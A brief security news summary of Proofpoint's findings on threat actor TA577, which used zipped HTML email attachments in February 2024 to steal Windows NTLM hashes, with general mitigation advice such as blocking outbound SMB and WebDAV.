Proofpoint cybersecurity researchers have identified threat actor TA577 targeting organizations with rogue email attachments that steal Microsoft Windows NT LAN Manager (NTLM) authentication information.


In a series of campaigns on February 26 and 27, 2024, tens of thousands of emails were sent as replies to previous messages, containing zipped HTML attachments with unique file hashes [1]. The group aims to steal NTLM hashes for potential password cracking or “Pass-The-Hash” attacks within targeted organizations [1] [3]. The delivery method involves malicious HTML files within zip archives [3], bypassing security measures and posing a significant threat [3]. The researchers observed the use of the open-source toolkit Impacket on SMB servers, potentially compromising sensitive information such as computer names and usernames [2]. It was noted that disabling guest access to SMB does not prevent the attack, as the file must authenticate to the external server [2]. Organizations are advised to block outbound SMB and WebDAV connections to prevent such data breaches as seen in this campaign.


This campaign highlights the importance of robust cybersecurity measures to protect against sophisticated threats like TA577. Organizations should take immediate steps to secure their systems by implementing strong authentication protocols, monitoring network traffic for suspicious activity, and regularly updating security software. By staying vigilant and proactive, businesses can mitigate the risks posed by malicious actors and safeguard their sensitive information.